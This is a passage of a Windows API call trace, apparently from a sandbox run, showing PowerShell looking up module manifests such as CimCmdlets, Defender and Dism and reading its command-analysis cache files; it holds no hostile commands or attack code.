nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.355] CoTaskMemFree (pv=0x25b73cfcc20) [0282.356] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1", lpFilePart=0x0) returned 0x4d [0282.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.356] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\CimCmdlets\\CimCmdlets.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\cimcmdlets\\cimcmdlets.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c784ae8 | out: lpFileInformation=0x25b5c784ae8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f2a3292, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f2a3292, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f2a3292, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x72c)) returned 1 [0282.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.356] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.356] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.356] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.356] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_c7eb4b69-9a99-4759-8ce7-7d58150c1910", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_c7eb4b69-9a99-4759-8ce7-7d58150c1910", lpFilePart=0x0) returned 0x93 [0282.356] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.356] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_c7eb4b69-9a99-4759-8ce7-7d58150c1910" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_c7eb4b69-9a99-4759-8ce7-7d58150c1910"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9c0 [0282.357] GetFileType (hFile=0x9c0) returned 0x1 [0282.357] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.357] GetFileType (hFile=0x9c0) returned 0x1 [0282.357] ReadFile (in: hFile=0x9c0, lpBuffer=0x25b5c785d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c785d78*, lpNumberOfBytesRead=0x653ef8d338*=0xb8b, lpOverlapped=0x0) returned 1 [0282.359] ReadFile (in: hFile=0x9c0, lpBuffer=0x25b5c785d78, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c785d78*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.359] CloseHandle (hObject=0x9c0) returned 1 [0282.359] ReleaseMutex (hMutex=0x9bc) returned 1 [0282.407] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0282.407] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfb900 [0282.408] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfb900, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.408] CoTaskMemFree (pv=0x25b73cfb900) [0282.408] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfe7c0 [0282.408] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfe7c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.408] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.408] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.408] GetCurrentProcess () returned 0xffffffffffffffff [0282.408] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9c0) returned 1 [0282.408] GetTokenInformation (in: TokenHandle=0x9c0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.408] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739849f0 [0282.408] GetTokenInformation (in: TokenHandle=0x9c0, TokenInformationClass=0x1, TokenInformation=0x25b739849f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739849f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.409] LocalFree (hMem=0x25b739849f0) returned 0x0 [0282.409] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c78c040, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c78c040*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.409] CreateMutexW (lpMutexAttributes=0x25b5c78c190, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9c4 [0282.409] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9c4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.409] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.409] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.409] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.410] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1", lpFilePart=0x0) returned 0x49 [0282.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.410] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Defender\\Defender.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\defender\\defender.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c78c7d8 | out: lpFileInformation=0x25b5c78c7d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe2d621b, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xe2d621b, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xe2d621b, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x544)) returned 1 [0282.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.410] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.410] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.410] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.410] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_213a5eb1-3d7a-4129-91a9-30546a2a3348", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_213a5eb1-3d7a-4129-91a9-30546a2a3348", lpFilePart=0x0) returned 0x93 [0282.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.410] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_213a5eb1-3d7a-4129-91a9-30546a2a3348" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_213a5eb1-3d7a-4129-91a9-30546a2a3348"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9c8 [0282.411] GetFileType (hFile=0x9c8) returned 0x1 [0282.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.411] GetFileType (hFile=0x9c8) returned 0x1 [0282.411] ReadFile (in: hFile=0x9c8, lpBuffer=0x25b5c78da60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c78da60*, lpNumberOfBytesRead=0x653ef8d338*=0x6ba, lpOverlapped=0x0) returned 1 [0282.413] ReadFile (in: hFile=0x9c8, lpBuffer=0x25b5c78da60, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c78da60*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.413] CloseHandle (hObject=0x9c8) returned 1 [0282.413] ReleaseMutex (hMutex=0x9c4) returned 1 [0282.413] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", lpFilePart=0x0) returned 0x71 [0282.414] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfa800 [0282.414] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfa800, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.414] CoTaskMemFree (pv=0x25b73cfa800) [0282.414] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfe7c0 [0282.414] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfe7c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.414] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.414] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.414] GetCurrentProcess () returned 0xffffffffffffffff [0282.414] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9c8) returned 1 [0282.415] GetTokenInformation (in: TokenHandle=0x9c8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.415] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b739843f0 [0282.415] GetTokenInformation (in: TokenHandle=0x9c8, TokenInformationClass=0x1, TokenInformation=0x25b739843f0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b739843f0, ReturnLength=0x653ef8d6b8) returned 1 [0282.415] LocalFree (hMem=0x25b739843f0) returned 0x0 [0282.416] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c792950, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c792950*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.416] CreateMutexW (lpMutexAttributes=0x25b5c792aa0, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9cc [0282.416] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9cc, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.416] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfd8e0 [0282.416] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfd8e0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.416] CoTaskMemFree (pv=0x25b73cfd8e0) [0282.416] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1", lpFilePart=0x0) returned 0x71 [0282.416] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.416] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\DirectAccessClientComponents\\DirectAccessClientComponents.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\directaccessclientcomponents\\directaccessclientcomponents.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c793138 | out: lpFileInformation=0x25b5c793138*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa3b30d, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0xfa3b30d, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0xfa3b30d, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x436)) returned 1 [0282.416] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.416] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.417] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.417] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.417] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_eb75c086-2f8d-4487-bdb8-55cfc0a6f6c4", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_eb75c086-2f8d-4487-bdb8-55cfc0a6f6c4", lpFilePart=0x0) returned 0x93 [0282.417] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.417] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_eb75c086-2f8d-4487-bdb8-55cfc0a6f6c4" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_eb75c086-2f8d-4487-bdb8-55cfc0a6f6c4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9d0 [0282.418] GetFileType (hFile=0x9d0) returned 0x1 [0282.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d440) returned 1 [0282.418] GetFileType (hFile=0x9d0) returned 0x1 [0282.418] ReadFile (in: hFile=0x9d0, lpBuffer=0x25b5c794438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d338, lpOverlapped=0x0 | out: lpBuffer=0x25b5c794438*, lpNumberOfBytesRead=0x653ef8d338*=0x6eb, lpOverlapped=0x0) returned 1 [0282.420] ReadFile (in: hFile=0x9d0, lpBuffer=0x25b5c794438, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x653ef8d308, lpOverlapped=0x0 | out: lpBuffer=0x25b5c794438*, lpNumberOfBytesRead=0x653ef8d308*=0x0, lpOverlapped=0x0) returned 1 [0282.420] CloseHandle (hObject=0x9d0) returned 1 [0282.420] ReleaseMutex (hMutex=0x9cc) returned 1 [0282.420] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d380, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1", lpFilePart=0x0) returned 0x41 [0282.420] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cfe7c0 [0282.420] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cfe7c0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.420] CoTaskMemFree (pv=0x25b73cfe7c0) [0282.421] CoTaskMemAlloc (cb=0x20c) returned 0x25b73cfb4c0 [0282.421] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x25b73cfb4c0 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local") returned 0x0 [0282.421] CoTaskMemFree (pv=0x25b73cfb4c0) [0282.421] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x653ef8d100, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local", lpFilePart=0x0) returned 0x23 [0282.421] GetCurrentProcess () returned 0xffffffffffffffff [0282.421] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x653ef8d5b8 | out: TokenHandle=0x653ef8d5b8*=0x9d0) returned 1 [0282.421] GetTokenInformation (in: TokenHandle=0x9d0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x0, ReturnLength=0x653ef8d6b8) returned 0 [0282.421] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x25b73984df0 [0282.421] GetTokenInformation (in: TokenHandle=0x9d0, TokenInformationClass=0x1, TokenInformation=0x25b73984df0, TokenInformationLength=0x2c, ReturnLength=0x653ef8d6b8 | out: TokenInformation=0x25b73984df0, ReturnLength=0x653ef8d6b8) returned 1 [0282.422] LocalFree (hMem=0x25b73984df0) returned 0x0 [0282.422] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x25b5c799120, cbSid=0x653ef8d6b0 | out: pSid=0x25b5c799120*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x653ef8d6b0) returned 1 [0282.422] CreateMutexW (lpMutexAttributes=0x25b5c799270, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-1560258661-3990802383-1811730007-1000") returned 0x9d4 [0282.422] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x653ef8d550*=0x9d4, lpdwindex=0x653ef8d324 | out: lpdwindex=0x653ef8d324) returned 0x0 [0282.422] CoTaskMemAlloc (cb=0x20e) returned 0x25b73cffae0 [0282.423] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x25b73cffae0, nSize=0x105 | out: lpBuffer="") returned 0x0 [0282.423] CoTaskMemFree (pv=0x25b73cffae0) [0282.423] GetFullPathNameW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1", nBufferLength=0x105, lpBuffer=0x653ef8d210, lpFilePart=0x0 | out: lpBuffer="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1", lpFilePart=0x0) returned 0x41 [0282.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d6a0) returned 1 [0282.423] GetFileAttributesExW (in: lpFileName="c:\\windows\\system32\\windowspowershell\\v1.0\\Modules\\Dism\\Dism.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\dism\\dism.psd1"), fInfoLevelId=0x0, lpFileInformation=0x25b5c7998a8 | out: lpFileInformation=0x25b5c7998a8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1366e83e, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x1366e83e, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x1366e83e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x817)) returned 1 [0282.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d660) returned 1 [0282.423] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x653ef8d140, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x51 [0282.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d590) returned 1 [0282.423] GetFileAttributesExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x653ef8d670 | out: lpFileInformation=0x653ef8d670*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x47cd6d9c, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x6ac9aa0f, ftLastAccessTime.dwHighDateTime=0x1d93633, ftLastWriteTime.dwLowDateTime=0x6ac9aa0f, ftLastWriteTime.dwHighDateTime=0x1d93633, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1 [0282.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x653ef8d550) returned 1 [0282.423] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_878e1643-f6c1-4684-bbb0-f3ea8a237177", nBufferLength=0x105, lpBuffer=0x653ef8cff0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_878e1643-f6c1-4684-bbb0-f3ea8a237177", lpFilePart=0x0) returned 0x93 [0282.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x653ef8d4d0) returned 1 [0282.423] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_878e1643-f6c1-4684-bbb0-f3ea8a237177" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_878e1643-f6c1-4684-bbb0-f3ea8a237177"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x9d8 [0282.424] GetFileType 